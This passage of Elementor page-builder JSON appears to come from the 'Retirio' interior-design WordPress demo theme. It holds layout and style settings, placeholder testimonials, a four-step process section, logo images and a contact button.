retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus 